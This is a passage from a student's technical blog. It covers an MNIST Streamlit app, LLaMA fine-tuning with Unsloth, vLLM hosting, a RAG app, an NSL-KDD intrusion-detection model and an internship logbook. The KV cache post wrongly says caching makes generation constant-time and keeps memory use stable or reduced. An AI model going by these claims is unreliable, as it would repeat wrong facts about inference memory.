        st.error(f"Error loading model: {e}")
        return None

model = load_mnist_model()

st.title("MNIST Digit Classifier")
st.markdown("Draw a digit on the canvas below and see the model predict the digit!")

st.sidebar.header("Configuration")
b_color = st.sidebar.color_picker("Brush color", "#000000")
bg_color = st.sidebar.color_picker("Background color", "#FFFFFF")
drawing_mode = st.sidebar.checkbox("Drawing mode?", True)

canvas_result = st_canvas(
    stroke_width=20,
    stroke_color=b_color,
    background_color=bg_color,
    height=280,
    width=280,
    drawing_mode='freedraw' if drawing_mode else 'transform',
    key="canvas"
)

def preprocess_image(image_data):
    img = Image.fromarray(image_data.astype('uint8'), 'RGBA').convert('L')
    img = img.resize((28, 28))
    img = Image.eval(img, lambda x: 255 - x)
    img = np.array(img).astype('float32') / 255.0
    img = img.reshape(1, 28, 28, 1)
    return img

if model is not None and canvas_result.image_data is not None:
    img = preprocess_image(canvas_result.image_data)
    prediction = model.predict(img)
    pred_digit = np.argmax(prediction)
    probabilities = prediction[0]
    st.write(f"Predicted digit: **{pred_digit}**")
    prob_df = pd.DataFrame(probabilities, index=range(10), columns=["Probability"])
    st.bar_chart(prob_df)
else:
    st.write("Please draw a digit on the canvas.")

`@st.cache_resource` + `load_mnist_model()`

Loads the trained model once using caching for performance.

`st_canvas`

Canvas where the user can draw a digit.

`preprocess_image(image_data)`

Converts canvas image to grayscale.
Resizes to 28x28.
Inverts pixel colors (white-on-black → black-on-white).
Normalizes and reshapes to CNN input format.

Live Prediction and Visualization

Once the user draws:
- The image is processed and passed to the model.
- Prediction is shown alongside a bar chart of probabilities (using st.bar_chart()).

Run the App

streamlit run app.py

Fine-Tuning LLaMA 3.1 with Unsloth

Mohammed Alshukaili — Fri, 31 Jan 2025 10:20:10 GMT

Introduction to LLM Inference

In this post, I will walk through how to fine-tune Meta's LLaMA 3.1 8B model using Unsloth, a library optimized for efficient LLM training. I will cover everything from installing dependencies to training and saving the fine-tuned model.

1. Setting Up the Environment

Before we begin fine-tuning, we need to install the required packages:

%%capture
!pip install unsloth
!pip install datasets
!pip uninstall unsloth -y && pip install --upgrade --no-cache-dir --no-deps git+https://github.com/unslothai/unsloth.git

unsloth is the primary library used for loading and fine-tuning the LLaMA model efficiently.
datasets helps us handle and preprocess text datasets.
We uninstall and reinstall unsloth from its latest GitHub version to ensure we have the newest features and bug fixes.

2. Model Configuration and Loading

from unsloth import FastLanguageModel
import torch

# Configuration
max_seq_length = 8192  # Setting the context length to 8192
dtype = torch.bfloat16  
load_in_4bit = False 

model_name = "unsloth/Meta-Llama-3.1-8B"

# Load the model and tokenizer
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name=model_name,
    max_seq_length=max_seq_length,
    dtype=dtype,
    load_in_4bit=load_in_4bit,
)

We define a sequence length of 8192, which means the model can process long-context data.
dtype = torch.bfloat16 sets bfloat16 as the precision type, reducing memory usage.
The model is loaded using FastLanguageModel.from_pretrained(), which fetches Meta LLaMA 3.1 8B.

3. Applying LoRA for Efficient Fine-Tuning

model = FastLanguageModel.get_peft_model(
    model,
    r = 16, 
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj"],
    lora_alpha = 16,
    lora_dropout = 0, 
    bias = "none",    
    use_gradient_checkpointing = "unsloth", 
    random_state = 3407,
    use_rslora = False,  
    loftq_config = None, 
)

We apply LoRA (Low-Rank Adaptation) to reduce the number of trainable parameters:

r = 16: The rank of LoRA updates (trade-off between memory and adaptability).
lora_alpha = 16: A scaling factor for LoRA layers.
use_gradient_checkpointing = "unsloth": Reduces memory usage during training.
This allows efficient fine-tuning without modifying the entire model.

4. Loading and Preprocessing the Dataset

from datasets import Dataset

# Load dataset from JSON file
dataset = Dataset.from_json("dataset.json")

5. Formatting the Dataset

custom_prompt = """Below is a prompt and its corresponding response. Write a completion that adheres to the response.

### Prompt:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token  

def formatting_prompts_func(examples):
    prompts = examples["prompt"]
    responses = examples["response"]
    texts = []
    for prompt, response in zip(prompts, responses):
        text = custom_prompt.format(prompt, response) + EOS_TOKEN
        texts.append(text)
    return {"text": texts}

dataset = dataset.map(formatting_prompts_func, batched=True)

We format the dataset into a prompt-response structure, adding an EOS_TOKEN at the end to indicate completion.
This function ensures that our training data follows a structured format for proper fine-tuning.

6. Tokenizing the Dataset

def tokenize_function(examples):
    return tokenizer(examples["text"], truncation=True, padding="max_length", max_length=8192)

tokenized_dataset = dataset.map(tokenize_function, batched=True)

# Save tokenized dataset for fine-tuning
tokenized_dataset.save_to_disk("tokenized_dataset")

print("Dataset preprocessing complete. Ready for fine-tuning!")

The function tokenizes our formatted dataset, ensuring each sample fits within the 8192-token limit.
We truncate longer inputs and pad shorter ones to maintain uniformity.
The dataset is then saved for training

7. Fine-Tuning the Model

from trl import SFTTrainer
from transformers import TrainingArguments
from unsloth import is_bfloat16_supported

trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    train_dataset=tokenized_dataset,
    dataset_text_field="text",
    max_seq_length=max_seq_length,
    dataset_num_proc=2,
    packing=False,  
    args=TrainingArguments(
        per_device_train_batch_size=2,
        gradient_accumulation_steps=4,
        warmup_steps=5,
        num_train_epochs=2,  
        learning_rate=2e-4,
        fp16=not is_bfloat16_supported(),
        bf16=is_bfloat16_supported(),
        logging_steps=1,
        optim="adamw_8bit",
        weight_decay=0.01,
        lr_scheduler_type="linear",
        seed=3407,
        output_dir="outputs",
        report_to="none",  
    ),
)
trainer_stats = trainer.train()

We use SFTTrainer (Supervised Fine-Tuning) from trl to manage training.
gradient_accumulation_steps=4 helps optimize memory usage.
learning_rate=2e-4 sets the learning rate for gradual updates.
The optimizer adamw_8bit is used for efficiency.
The model is trained for 2 epochs with a batch size of 2 per GPU.

8. Saving the Fine-Tuned Model

model.save_pretrained_merged("model", tokenizer, save_method="merged_16bit")

Saves the fine-tuned model in a 16-bit format to optimize storage.
The model is now ready for inference and further deployment.

Conclusion

Fine-tuning LLaMA 3.1 with Unsloth offers a powerful and memory-efficient way to adapt LLMs for custom use cases. By using LoRA, structured dataset preparation, and an optimized training approach, we can achieve high-quality results with limited resources.

Graduation Planning

Mohammed Alshukaili — Tue, 31 Dec 2024 02:11:42 GMT

This blog will highlight my planning process for the graduation semester using Trello.

Sprint 1

Highlights:

Project Plan
Start on the research
Discuss MoSCoW with stakeholders

Sprint 2

Highlights:

Design Document
EU AI Act Document
Get Project Plan Approval
Functional Design Document

Sprint 3

Highlights:

Answer Research Question 4
Finish First Version of Portfolio
Research Prices of Cloud GPUs as Temporary Solution

Sprint 4

Highlights:

LLM Design Plan
Technical Implementation Guide Document
Secura Christmas Party

Sprint 5

Highlights:

Finished the LLM Design Plan Document.
Finished the Technical Implementation Guide Document.
Build the application on the LLM machine.
Start finding ways to improve the accuracy.

Sprint 6

Highlights:

Finalizing the project and the Portfolio.

KV Cache in LLMs

Mohammed Alshukaili — Tue, 15 Oct 2024 10:03:14 GMT

In this blog, I will explain what KV cache is and how it is used in LLM inference.

Introduction to LLM Inference

Large Language Model (LLM) inference is the process of generating outputs from pre-trained models. It involves running the model to complete tasks such as text generation, translation, or answering questions. Efficient inference is important for reducing latency and resource usage, particularly for real-time applications like chatbots

KV (Key-Value) cache

KV (Key-Value) cache is a mechanism used in large language model (LLM) inference to store and reuse intermediate computations during text generation. In autoregressive models like GPT, each new token is generated based on previous tokens. Normally, the model reprocesses the entire input sequence for every token prediction, which can be computationally expensive and slow, especially for long sequences.

The KV cache optimizes this process by storing the key-value pairs generated from previous tokens. These pairs represent the attention mechanism’s outputs that the model uses to focus on relevant parts of the input during inference. By caching these values, the model avoids recalculating them for each token, significantly speeding up the generation process and reducing memory consumption.

This caching mechanism is particularly beneficial for applications like real-time chatbots, where response times are important, and long context windows need to be processed efficiently. Without KV caching, the model would need to repeatedly process the entire sequence, leading to slower performance and higher computational costs.

How KV Cache Works in LLMs

KV cache plays a critical role in optimizing the inference process of autoregressive large language models (LLMs) by reducing redundant computations. To understand how it works, let’s break down its function step by step:

3.1 Storing Key-Value Pairs

In a transformer-based LLM, each layer of the model computes attention weights based on "queries" (Q), "keys" (K), and "values" (V). These components are used to determine how much attention should be paid to each part of the input sequence when generating the next token. Normally, each new token generation requires recalculating attention over the entire sequence of input tokens, which increases the processing time as the sequence grows.

With KV caching, the model stores the key-value pairs generated during the initial pass through the sequence in memory. These stored pairs can then be reused for subsequent token generation without recalculating them, as they remain the same for the sequence’s previous tokens.

3.2 Reusing Past Context

During inference, when generating the next token, the model uses the cached key-value pairs from previous tokens instead of recalculating the attention for those tokens. This allows the model to only focus on the newly generated token while leveraging the cached data for the rest of the sequence.

For example, when generating the 100th token in a sequence, the model doesn't need to reprocess the first 99 tokens. It reuses the cached K-V pairs and only processes the 100th token, reducing the overall computational load.

3.3 Benefits of KV Cache

Faster Inference: By eliminating the need to recompute attention scores for previous tokens, KV caching significantly speeds up the inference process, especially for longer sequences.
Efficient Memory Usage: While caching requires memory to store the key-value pairs, it prevents the need to repeatedly process long input sequences, reducing memory and computational overhead.
Scalability: KV caching allows LLMs to handle long context windows efficiently, making it ideal for tasks such as document summarization, chatbot conversations, or any application that requires continuous interaction with long sequences of text.

By caching attention results, KV cache enhances the model's ability to generate text more quickly and efficiently, particularly in tasks that demand quick responses and low latency.

Performance Impact of KV Caching

KV caching has a significant impact on the performance of large language models (LLMs) during inference, particularly in terms of speed, memory efficiency, and scalability. Here’s how it affects performance:

4.1 Speed Improvements

One of the primary benefits of KV caching is the substantial boost in inference speed. In models without KV caching, every token generation requires the model to reprocess the entire sequence of previous tokens, which becomes increasingly time-consuming as the sequence length grows.

By storing and reusing key-value pairs, the model avoids redundant computations for previously processed tokens. This results in a constant-time complexity for token generation, regardless of the sequence length. For long sequences, this can lead to an order of magnitude improvement in speed, particularly in real-time applications like chatbots or live translations, where fast response times are crucial.

4.2 Memory Efficiency

While KV caching does introduce a memory overhead due to the storage of key-value pairs, this trade-off is generally outweighed by the efficiency gains. By reducing the need to reprocess the entire input, KV caching conserves memory resources that would otherwise be consumed by repeated attention calculations over long sequences.

Additionally, the memory footprint remains relatively stable as the model only needs to store one set of key-value pairs per attention layer. This contrasts with non-caching approaches, where memory usage grows linearly with the sequence length as the model repeatedly processes the entire sequence.

4.3 Handling Long Sequences

LLMs are known to struggle with handling long input sequences during inference, as the computational cost of processing every token grows significantly with sequence length. KV caching allows the model to efficiently handle these long sequences by only focusing on newly generated tokens while reusing cached data for previous tokens.

This makes KV caching ideal for applications requiring continuous interaction with long text streams, such as:

Conversations: In chatbots or virtual assistants, where previous conversation history needs to be referenced.
Document Summarization: Handling long documents without being overwhelmed by the growing sequence length.
Code Generation: Keeping track of long code contexts efficiently during token generation.

4.4 Benchmarking KV Caching Performance

Several benchmarks and tests across popular LLM architectures have demonstrated the benefits of KV caching. For example:

GPT-style models show up to a 10x speed improvement when using KV caching for sequences longer than 500 tokens.
Latency reduction: In real-time applications, latency drops significantly with caching, making it a critical component for low-latency environments.
Resource conservation: KV caching reduces the strain on hardware, making models more cost-effective to run on GPUs, TPUs, or even CPUs in some cases.

Overall, the performance impact of KV caching is profound, allowing LLMs to scale more effectively while reducing the computational cost and latency associated with long-sequence inference. This optimization is essential for deploying LLMs in real-world, latency-sensitive applications like virtual assistants, content generation tools, and large-scale NLP services.

Conclusion

KV caching is important optimization in large language model (LLM) inference, significantly enhancing speed, memory efficiency, and scalability. By storing and reusing key-value pairs, models can generate text faster and handle longer sequences with lower computational costs. This makes KV caching indispensable for real-time applications like chatbots, document summarization, and code generation, where low latency and efficient resource usage are critical.

References

https://www.youtube.com/watch?v=eMlx5fFNoYc
https://www.youtube.com/watch?v=hMs8VNRy5Ys
https://medium.com/cj-express-tech-tildi/how-does-vllm-optimize-the-llm-serving-system-d3713009fb73

Graduation Logbook

Mohammed Alshukaili — Fri, 27 Sep 2024 13:54:51 GMT

This blog will showcase my progress and feedback from my mentor throughout my graduation semester at Secura.

The graduation semester spans 18 weeks, from September 2, 2024, to January 24, 2025.

Weeks 1 and 2 (September 2, 2024 - September 13, 2024)

Project Planning: Created a comprehensive project plan in line with the university's requirements.
Functional Document: Began drafting a functional document aimed at explaining the project to non-technical stakeholders.
University Supervisor Meeting: Held my first meeting with the university supervisor to discuss the project's direction and goals.
LLM Fine-tuning: Started fine-tuning a local LLM model to handle LaTeX content translation.
Interview: I interviewed my company mentor asking him some questions regarding my project at Secura.
Research: I finished the first 2 research question. First research question helped me to choose an open-source LLM which is Llama 3.1 for my project, and the second research question analyzed the hardware requirements for that mode which is dual 4090 GPU.

Feedback from Joel:

The use cases and functional requirements are good, but there are some important sections missing.
The functional and technical design should explain the current setup and what it will look like when the project is finished.
Add a section called "Justification of Choice for Research Environment." This should explain why you chose the operating system, focusing on things like how future-proof and user-friendly it is.
Include a section about hardware. Since this is the functional design, explain what hardware is needed and for what purpose, but there’s no need to include technical details.
Add a section on security. This should cover things like who can access the system, the security policies in place, and how physical access is managed.
It would be helpful to use a MoSCoW chart to clearly define the project goals and priorities.

Feedback from Gayatri:

We discussed the overall project and its scope, and Gayatri emphasized the need to focus more on the infrastructure side rather than the software.
The initial draft of the project plan included 10 research questions, but Gayatri recommended reducing the number to a maximum of 5 to keep the project manageable.
Gayatri suggested shifting the project's focus more towards the infrastructure aspect, ensuring it aligns with the company's needs, and university requirements.

Weeks 3 and 4 (September 16, 2024 - September 27, 2024)

Project Plan & Functional Design Updates: Added additional details to both the project plan and the functional design document.
Backend Server Research: Conducted research on backend server options and concluded that it would be valuable to include in my in-depth research.
MoSCoW Board Discussion: Had a meeting with Joel to discuss the MoSCoW board and prioritize project elements.
First Company Visit: Gayatri visited me at the Secura Amsterdam office. We discussed my progress with my company mentor.
Functional Document: Describe things in a non-technical way.

Feedback from Joel:

Invest some time to look at the EU AI Act and how it is used in the project.

Feedback from Gayatri:

Gayatri liked the structure of the first version of the project plan and mentioned that it is almost perfect.
To complete the project plan, Gayatri recommended adding a network diagram and a list of professional products for each learning outcome.
Create design challenge document.
Create logbook.

Weeks 5 and 6 (September 30, 2024 - October 11, 2024)

Functional Document: I finished the functional document that describes things in a non-technical way, and it was approved by my company mentor.
Technical Design Document: I created the first draft of technical design document.
Research: I finished the 3rd research question that talks about vector databases, and I concluded that I will be using Chroma DB for my project.
Design Challenge Document: I finished the design challenge document.
EU AI Act Document: I created a document discussing the EU AI Act and how it applies in my project.

Feedback from Joel:

He approved the functional design document and advised to start translating it into technical design document.
The first draft of technical design document is missing the details of how I plan to build the LLM server. I still do not know the details. Therefore, I suggested that I finish my research first, then create the technical document, Joel agreed on this approach.

Weeks 7 and 8 (October 14, 2024 - November 01, 2024)

Research: I finished the 4th research question which talked about the backend and frontend frameworks for my project. I ended up choosing vLLM for the backend, and Open web UI for the frontend.
Portfolio: I started creating the Portfolio by combining every professional product in one place. I submitted the first version of the portfolio.
Reading: I invested some time reading about new trends in open source AI models. This can help me create the advise report later this semester.
Cloud Prices: Joel asked me to research the prices of GPUs using the cloud and choose the best one for my project in case there is another delay in the hardware. Therefore, I created a document detailing the price of many possible services.

Feedback from Joel:

You have answered sub-questions 1 to 4 so far, but the elaboration is rather short, and it would be good to read more about the "how" and "why" behind your choices, as I believe you have done the analysis to determine which option is best.
For example, "Chroma DB’s user-friendly interface and many plugins make it easier to set up and use, saving time during development," but the "how" and "why" are missing, so more details about the kind of plugins and their specific benefits would be helpful; another example is "Open Web UI was chosen for its user-friendly design," which would benefit from an explanation of why this design is better compared to other options.
Mohammed is always offering to help, but it should not limit him in his eagerness to analyze, test or execute things without asking.

Feedback from Gayatri:

You are doing well in showcasing all learning outcomes with proper evidence.
Try to add some theory in the Project Approach section, preferably in the form of diagrams or other visual elements.
For each sub-question: Explain its DOT framework and strategy, Remove the conclusion for each question, Add a solution for each question instead.
For Conclusions and recommendations: Include them as separate topics for the overall report, Do not add them for each question individually.
The rest is progressing well.

Weeks 9 and 10 (November 4, 2024 - November 15, 2024)

Literature Review: I read about LLM optimization techniques. This can help me improve the speed of the LLM inference.
Cybersecurity Event in Utrecht: My company mentor Joel advised me to visit a cybersecurity event in Utrecht. It was a special experiences meeting professionals in the field of cybersecurity and AI.
Meeting with IT department: Me and Joel had a meeting with the IT specialist discussing the status of the LLM hardware and how I will be able to access it.
Mid-term reviews: I asked Joel to fill in the mid-term review for Fontys. I also filled in one myself reflecting on my progress so far.

Feedback from Joel:

Find out how Secura writes test plan document and create one for your project.
Joel said that Ralph approved paying for the cloud as a temporary solution. Therefore, start building you findings using a cloud provider.

Weeks 11 and 12 (November 18, 2024 - November 29, 2024)

Mid-term Return Day Pitch: I presented my progress to my 2 Fontys assessors and to some students. I was also able to learn from other graduates who presented their work.
Assessors Feedback: I worked on the feedback received from the 2 assessors.
Rent a GPU: I used the cloud to rent a GPU and build my product on it as a temporary solution.
Demo: I showed Joel a demo for the LLM deployed on the cloud.

Feedback from Mehrzad:

Show the approach better (DOT framework usage in details)
Show agenda for the presentation
Show page numbers
Include a page for sprints activities
Explain why your solution is better than using ready products like ChatGPT.

Weeks 13 and 14 (December 02, 2024 - December 13, 2024)

LLM Design Plan: I created an LLM Design Plan that explains to the IT department what is the LLM machine expected to do and what operating system should it run. I also explained what type of connections does it need and when should it be disconnected completely from internet access. The document also explains who will be the administrators for the application.
Technical Implementation Guide: I created a Technical Implementation Guide document that explains in details all the steps needed to host the frontend and the backend in an Ubuntu 20.04 server. The steps are the following:
- Download CUDA Toolkit
- Install cuDNN
- Install Python 3.11
- Create a Virtual Environment
- Install & Run the Backend (vLLM)
- Install & Run the Frontend (Open Web UI)
- Access the Application
Access the Server: I got SSH connection to the LLM machine. I installed the backend and the frontend and connected them with each other. I had issues installing Nvidia CUDA toolkit and cuDNN. However, I eventually successfully installed everything needed. Every issue and its fix is documented very well.
Secura Christmas Party: I got the chance to attend the company's Christmas party, it was nice meeting and connecting with other Secura employees.

Feedback from Joel:

Joel helped me to improve the documents.
Joel encountered error when trying to upload big document. I fixed this issue by increasing the LLM's capacity to handle around 10 thousand words per request.

Weeks 15 and 16 (December 16, 2024 - January 10, 2025) + Christmas Break

Meeting with Joel Regarding the Deliverables: I had a meeting with my mentor to discuss the deliverables for both company and university.
I canceled the cloud subscription: Now that we have a powerful server with dual 4090 locally, I canceled the cloud subscription.
Discussed the LLM's Accuracy with Joel: I had a meeting with Joel to discuss the current accuracy of the LLM and discuss plans on how to improve it. Joel asked me to find new ways to improve the accuracy.
New Embedding Model: To improve the accuracy, I installed a better and more powerful embedding model. One of the drawbacks is it would need more time to answer and it would consume more of the GPUs. However, Joel said that these issues can be over seen if the accuracy is getting better.

Feedback from Joel:

Create Back up plans.

Weeks 17 and 18 (January 13, 2025 - January 24, 2025) + Christmas Break

Meeting with Stakeholders: I had multiple meetings with Joel, Ralph, and Paul to discuss the future of this project. I showed them that the RAG and translator are working.
Fine Tuning the LLM: Paul asked me if I can fine tune the LLM on their own data. I used many Secura reports to create a dataset for the fine tuning. I managed to create a fine tuned model on only 1300 examples. I explained to them that in order to have decent quality, they need more examples to include.
Documenting: Joel, Ralph, and Paul mentioned that I should document every detail to make it easier for whoever comes after me working on the project.

Hosting Llama 3.1 Locally with Dual RTX 4090

Mohammed Alshukaili — Mon, 16 Sep 2024 21:12:00 GMT

Hosting large language models (LLMs) like Llama on local hardware provides the flexibility to handle sensitive data in-house while maximizing performance using advanced GPUs like the RTX 4090. In this post, I’ll walk you through how to set up Llama (Meta-Llama-3.1-70B) on an Ubuntu server using dual RTX 4090 GPUs. I will use vLLM as the backend for efficient model serving.

Creating a Virtual Environment

python3 -m venv .venv
source .venv/bin/activate

This command creates and activates a virtual environment named .venv, which isolates dependencies and packages for your project.

Installing vLLM

pip install vllm

vLLM is a high-performance backend server specifically designed for efficient serving of large language models. It allows you to expose LLMs as APIs that can be queried from external applications. Unlike traditional model-serving frameworks, vLLM is optimized for low-latency inference and supports advanced features like tensor parallelism (for distributing models across multiple GPUs).

By installing vllm, I am setting up the infrastructure needed to handle model requests and interact with our Llama model via an API.

Installing Tokenizers

pip install tokenizers==0.19.0

The tokenizers library is crucial for breaking down input text into tokens that the model understands. Different models use different tokenization schemes, so it's essential to have the correct version. Here, I am installing version 0.19.0 to ensure compatibility with the Llama model.

Installing Tokenizers

python3 -m vllm.entrypoints.openai.api_server \
  --model neuralmagic/Meta-Llama-3.1-70B-Instruct-quantized.w4a16 \
  --served-model-name meta-llama/Meta-Llama-3.1-70B-Instruct \
  --tensor-parallel-size 2 \
  --gpu-memory-utilization 0.98 \  
  --host 0.0.0.0 \
  --port 8000 \
  --max_model_len 8192

This command launches the vLLM server with the necessary parameters to serve the Llama model. Let's break down each part in detail:

Loading the Quantized Model

--model neuralmagic/Meta-Llama-3.1-70B-Instruct-quantized.w4a16

Quantization reduces the precision of the model weights (in this case, 4-bit weights with 16-bit activations) to decrease the size and speed up inference without significantly impacting accuracy. The neuralmagic/Meta-Llama-3.1-70B-Instruct-quantized.w4a16 model is a quantized version of the 70B Llama model, which makes it feasible to host on even high-end hardware like dual RTX 4090 GPUs.

Defining the Model Name for Serving

--served-model-name meta-llama/Meta-Llama-3.1-70B-Instruct

This parameter specifies the name by which the model will be identified when making API requests. It is especially useful if you plan to serve multiple models in the future, as each can be uniquely named and referenced.

Setting Tensor Parallelism for Multi-GPU Use

--tensor-parallel-size 2

Since I have two RTX 4090 GPUs, I set the tensor parallel size to 2. Tensor parallelism allows the model to split its operations across multiple GPUs, effectively sharing the load and accelerating inference. The large size of the Llama model (70B parameters) makes this kind of parallelism essential for efficient processing.

Configuring GPU Memory Utilization

--gpu-memory-utilization 0.98

This parameter ensures that nearly all available GPU memory (98%) is utilized, maximizing the model’s performance without hitting memory limits. The dual RTX 4090 GPUs have enough memory to comfortably handle this high utilization rate, allowing me to process larger batches of data or longer sequences.

Setting the Host Address

By setting the host to 0.0.0.0, the server listens on all available network interfaces. This is crucial if you want to access the model API from external machines on your network, such as other servers or workstations.

Setting the Port

--port 8000

The port number defines where the API server will be accessible. Port 8000 is a common choice, but you can change it based on your network configuration or preferences.

Defining Maximum Model Length

--max_model_len 8192

This parameter sets the maximum length (in tokens) that the model can process in a single request. Large language models like Llama can handle extensive inputs, and setting this value to 8192 ensures that even longer sequences of text can be handled efficiently.

Conclusion

By following the steps above, I have successfully hosted the Llama model on an Ubuntu server using dual RTX 4090 GPUs. With vLLM acting as the backend server, I now have a scalable, high-performance API that can handle real-time Llama model inference requests. This setup leverages GPU parallelism and model quantization to optimize performance while ensuring that your hardware is fully utilized.

Now, I can integrate this locally hosted model into various applications, whether for research, development, or deployment in production environments.

RAG Using Llama3

Mohammed Alshukaili — Wed, 19 Jun 2024 21:38:25 GMT

Retrieval-Augmented Generation (RAG) is crucial for companies with private documents, enhancing response accuracy by combining retrieval and generation. It allows accessing relevant internal data without relying on external APIs, ensuring data security and confidentiality while providing contextually accurate and coherent answers for applications like chatbots and virtual assistants.

In this blog post, I will create a Streamlit application that allows users to index documents and ask questions about them. I will use Elasticsearch for document storage and retrieval, and a local language model API for generating responses.

Setup

First, ensure you have all the required dependencies installed:

pip install streamlit elasticsearch sentence-transformers requests

Initializing Elasticsearch and SentenceTransformer

import streamlit as st
from elasticsearch import Elasticsearch
from sentence_transformers import SentenceTransformer
import requests
import os

es = Elasticsearch(
    hosts=[{'host': 'localhost', 'port': 9200, 'scheme': 'http'}]
)
model_name = 'all-MiniLM-L6-v2'
sentence_model = SentenceTransformer(model_name)

Creating the Elasticsearch Index

Create an Elasticsearch index to store the documents and their embeddings if it doesn't already exist.

def create_index():
    if not es.indices.exists(index="documents"):
        es.indices.create(
            index="documents",
            body={
                "mappings": {
                    "properties": {
                        "text": {"type": "text"},
                        "embedding": {"type": "dense_vector", "dims": 384}
                    }
                }
            }
        )

create_index()

Indexing Documents

Function to index a new document by generating its embedding and storing it in Elasticsearch.

def index_document(doc_text):
    embedding = sentence_model.encode(doc_text)
    es.index(
        index="documents",
        body={
            "text": doc_text,
            "embedding": embedding.tolist()
        }
    )

Handling User Questions

Generate the embedding for the user's question.

def handle_question(question):
    query_embedding = sentence_model.encode(question)

Retrieving Relevant Documents

response = es.search(
    index="documents",
    body={
        "query": {
            "script_score": {
                "query": {"match_all": {}},
                "script": {
                    "source": "cosineSimilarity(params.query_vector, 'embedding') + 1.0",
                    "params": {"query_vector": query_embedding.tolist()}
                }
            }
        },
        "size": 5
    }
)

retrieved_docs = [hit['_source']['text'] for hit in response['hits']['hits']]
context = " ".join(retrieved_docs)

Calling the Local Language Model API

def call_local_model(user_input):
    url = "http://192.168.1.10:11434/api/chat"
    payload = {
        "model": "llama3",
        "messages": [
            { "role": "user", "content": user_input }
        ],
        "stream": False
    }
    headers = {
        "Content-Type": "application/json"
    }
    response = requests.post(url, json=payload, headers=headers)
    
    try:
        response_json = response.json()
        print(response_json)
        return response_json
    except ValueError:
        st.error("Failed to decode JSON response")
        return None

Streamlit App

Initialize Streamlit session state variables.

if "conversation" not in st.session_state:
    st.session_state.conversation = None
if "chat_history" not in st.session_state:
    st.session_state.chat_history = []

Add a text area to input and index a new document.

st.header("ASK PDFs :books:")

new_document = st.text_area("Add a new document to the index:")
if st.button("Index Document"):
    if new_document:
        index_document(new_document)
        st.success("Document indexed successfully!")

Input for user questions and handle them using the previously defined functions.

user_question = st.text_input("Ask questions about the uploaded document:")
if user_question:
    handle_question(user_question)

Conclusion

In this blog post, I demonstrated how to create a Streamlit application that indexes documents and answers questions about them using Elasticsearch and a local language model API. This application allows users to interactively add documents and retrieve relevant information based on their queries.

AI-Powered IDS

Mohammed Alshukaili — Wed, 19 Jun 2024 20:50:31 GMT

In this blog post, I will walk you through the implementation of an AI-powered Intrusion Detection System (IDS) using machine learning techniques. I will cover the preprocessing of the dataset, building a neural network model, training the model, and evaluating its performance.

Importing Necessary Libraries

First, I need to import the necessary libraries for our project. These include libraries for data manipulation, visualization, and building neural networks.

import torch
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt 
import pandas as pd
%matplotlib inline

Loading the Dataset

Next, I load the training and testing datasets. These datasets contain network traffic data which we will use to train and evaluate our model.

df = pd.read_csv('./archive/KDDTrain+.txt', header=None)  
test_df = pd.read_csv('./archive/KDDTest+.txt', header=None)  
columns = [
    'duration', 'protocol_type', 'service', 'flag', 'src_bytes', 'dst_bytes', 'land',
    'wrong_fragment', 'urgent', 'hot', 'num_failed_logins', 'logged_in', 'num_compromised',
    'root_shell', 'su_attempted', 'num_root', 'num_file_creations', 'num_shells',
    'num_access_files', 'num_outbound_cmds', 'is_host_login', 'is_guest_login', 'count',
    'srv_count', 'serror_rate', 'srv_serror_rate', 'rerror_rate', 'srv_rerror_rate',
    'same_srv_rate', 'diff_srv_rate', 'srv_diff_host_rate', 'dst_host_count',
    'dst_host_srv_count', 'dst_host_same_srv_rate', 'dst_host_diff_srv_rate',
    'dst_host_same_src_port_rate', 'dst_host_srv_diff_host_rate', 'dst_host_serror_rate',
    'dst_host_srv_serror_rate', 'dst_host_rerror_rate', 'dst_host_srv_rerror_rate',
    'attack', 'level'
]
df.columns = columns
test_df.columns = columns

Data Preprocessing

To prepare the data for training, I convert the attack column to a binary format, where 'normal' traffic is labeled as 0 and all other traffic is labeled as 1. I also encode categorical variables.

df['attack_binary'] = df.attack.map(lambda a: 0 if a == 'normal' else 1)
df.drop('attack', axis=1, inplace=True)

test_df['attack_binary'] = test_df.attack.map(lambda a: 0 if a == 'normal' else 1)
test_df.drop('attack', axis=1, inplace=True)

from sklearn import preprocessing
le = preprocessing.LabelEncoder()
clm = ['protocol_type', 'service', 'flag']
for x in clm:
    df[x] = le.fit_transform(df[x])
    test_df[x] = le.fit_transform(test_df[x])

Feature Selection

I select specific features for our model to train on.

features = ['service', 'flag', 'src_bytes', 'dst_bytes', 'logged_in', 'count',
       'serror_rate', 'srv_serror_rate', 'same_srv_rate', 'diff_srv_rate',
       'dst_host_srv_count', 'dst_host_same_srv_rate',
       'dst_host_diff_srv_rate', 'dst_host_serror_rate',
       'dst_host_srv_serror_rate']
X = df[features]
y = df['attack_binary']
X = X.values
y = y.values

Splitting the Dataset

I split the dataset into training and testing sets.

from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=41)
X_train = torch.FloatTensor(X_train)
X_test = torch.FloatTensor(X_test)
y_train = torch.LongTensor(y_train)
y_test = torch.LongTensor(y_test)

Building the Neural Network Model

I define our neural network architecture.

class Model(nn.Module):
    def __init__(self, in_features=15, h1=30, h2=30, h3=30, out_features=2):
        super().__init__()
        self.fc1 = nn.Linear(in_features, h1)
        self.fc2 = nn.Linear(h1, h2)
        self.fc3 = nn.Linear(h2, h3)
        self.out = nn.Linear(h3, out_features)

    def forward(self, x):
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = F.relu(self.fc3(x))
        x = self.out(x)
        return x

Training the Model

I initialize the model, define the loss function and optimizer, and then train the model.

torch.manual_seed(41)
model = Model()
weights = torch.tensor([0.5, 3.0], dtype=torch.float32)  # Increase the weight for the 'attack' class
criterion = nn.CrossEntropyLoss(weight=weights)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
epochs = 600
losses = []
for i in range(epochs):
    y_pred = model.forward(X_train)
    loss = criterion(y_pred, y_train)
    losses.append(loss.detach().numpy())
    if i % 10 == 0:
        print(f'Epoch: {i} and loss: {loss}')
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
plt.plot(range(epochs), losses)
plt.ylabel("loss/errors")
plt.xlabel('Epoch')

Evaluating the Model

I evaluate the model's performance on the test set.

with torch.no_grad():
    y_eval = model.forward(X_test)
    loss = criterion(y_eval, y_test)
correct = 0 
